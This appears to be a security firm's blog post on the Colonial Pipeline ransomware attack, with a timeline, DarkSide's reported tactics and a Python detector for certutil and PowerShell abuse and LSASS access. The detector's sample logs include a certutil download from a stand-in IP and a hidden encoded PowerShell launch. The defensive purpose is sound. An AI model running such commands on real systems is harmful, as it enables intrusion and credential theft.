On Friday, May 7th, Colonial Pipeline suffered a cyberattack involving ransomware, causing them to shut down their IT systems and temporarily pause production on a majority of their pipelines. Additional details of the attack are still emerging each day, but here is a current timeline of events, along with details of how the hacker group, DarkSide, has carried out its attacks based on publicly available information.
May 6th
Colonial Pipeline networks are breached, 100GB of data is stolen and computers are encrypted with ransomware.
May 7th
Colonial Pipeline paid $4.4 million to DarkSide hacking group to decrypt their infrastructure.
May 8th
Colonial Pipeline, along with U.S. Government organizations and U.S. companies, takes offline the systems that were under the hackers' control.
Colonial Pipeline issues a statement on the attack, stating that they have been the victim of ransomware, have engaged a third-party cybersecurity firm, and have alerted law enforcement. Source: Colonial Pipeline Statement
May 9th
Colonial Pipeline issues a second statement giving an update on their investigation into the attack and the status of their pipeline operations. Source: Colonial Pipeline Statement
May 10th
FBI issues statement confirming DarkSide is the responsible party for the hack.
Colonial Pipeline issues a statement that their goal is to substantially restore service by the end of the week.
Colonial Pipeline manually operates a line from Greensboro, NC to Woodbine, MD for a limited period of time, but the other main lines remain offline.
May 11th
CISA and the FBI issue a joint cybersecurity advisory describing the ransomware used by DarkSide, with strategies for risk mitigation. Source: Joint Advisory
Colonial Pipeline’s website is offline for part of the day.
May 12th
Colonial Pipeline’s website is restored, and a new website is launched to address their response to the attack. Source: CP Cyber Response
Colonial Pipeline is able to restart service around 5:00pm. It will still take many days to replenish the depleted supply chain after panic buying of fuel and delayed fuel deliveries.
How Did DarkSide Launch the Attack?
Based on research into DarkSide, the methods below are the tactics the group has typically followed in recent attacks. Source: DarkSide Ransomware Research
- Attackers were able to gain access in a few different ways:
  - Phishing attacks
  - Brute-force password attacks
  - SQL injection against VPN networks
  - Utilizing TeamViewer
  - Installing backdoors
- Once inside the network, attackers escalated privileges by:
  - Exploiting the Zerologon vulnerability
  - Utilizing Mimikatz
  - Accessing and dumping the Local Security Authority Subsystem Service (LSASS)
- With privileged access, DarkSide uses PowerShell and Certutil to deploy and execute the ransomware across the network.
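As an added example (not part of the original post and not nGuard's or DarkSide's code), the following Python script shows how a defender could flag the deployment and credential-theft behaviours listed above in process telemetry: certutil used to download or decode a file, PowerShell launched hidden or with an encoded command, and a non-system process opening LSASS. The log records, hostnames, the 203.0.113.5 URL and the allowlist of legitimate LSASS readers are constructed assumptions to be tuned per environment.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style records (ProcessCreate = event 1, ProcessAccess = event 10).
# Hosts, paths and the 203.0.113.5 URL are illustrative, not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"event": "ProcessCreate", "host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.5/upd.bin C:\Users\Public\upd.bin"},
    {"event": "ProcessCreate", "host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -decode C:\Users\Public\upd.bin C:\Users\Public\upd.exe"},
    {"event": "ProcessCreate", "host": "dc01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBBAEEAQQA="},
    {"event": "ProcessAccess", "host": "dc01", "image": r"C:\Users\Public\upd.exe",
     "target": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"event": "ProcessAccess", "host": "dc01", "image": r"C:\Windows\System32\csrss.exe",
     "target": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1fffff"},
    {"event": "ProcessCreate", "host": "ws02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\certs\corp.cer"},  # benign certificate work, must not alert
]

# certutil fetching or decoding a payload instead of doing certificate work
CERTUTIL_RULE = re.compile(r"certutil(\.exe)?\s.*-(urlcache|decode|encode)\b", re.I)
# PowerShell started hidden, without a profile, or with an encoded command
POWERSHELL_RULE = re.compile(r"powershell(\.exe)?\s.*(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop(rofile)?\b)", re.I)
# Assumed allowlist of processes that legitimately open LSASS; tune per environment
LSASS_ALLOWED_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "svchost.exe", "msmpeng.exe"}


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule that one record triggers."""
    hits = []
    if event["event"] == "ProcessCreate":
        cmd = event.get("cmdline", "")
        if CERTUTIL_RULE.search(cmd):
            hits.append("certutil_download_or_decode")
        if POWERSHELL_RULE.search(cmd):
            hits.append("powershell_hidden_or_encoded")
    elif event["event"] == "ProcessAccess":
        source = event["image"].rsplit("\\", 1)[-1].lower()
        if event["target"].lower().endswith("\\lsass.exe") and source not in LSASS_ALLOWED_SOURCES:
            hits.append("lsass_access_from_unexpected_process")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Run all rules over the records; returns (host, rule, detail) triples in log order."""
    findings = []
    for ev in events:
        detail = ev.get("cmdline") or f"{ev['image']} -> {ev['target']}"
        findings.extend((ev["host"], rule, detail) for rule in classify(ev))
    return findings
```

Running `scan(SAMPLE_EVENTS)` yields four findings, and the benign certutil -verify and csrss.exe records produce none; in production these rules belong in your EDR or SIEM, correlated by host and time.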
Where to go from here?
The attack methods used by DarkSide should prompt a review of your organization’s security assessment program to ensure that the critical assessment activities below are included:
- Social Engineering
- External Penetration Testing
- Internal Penetration Testing
- Password Database Testing
- Red Team Testing
nGuard’s security assessment portfolio can help your organization find its vulnerabilities before the bad guys do. If your organization falls victim to a ransomware attack like the one at Colonial Pipeline, bring in our experts for Cybersecurity Incident Response.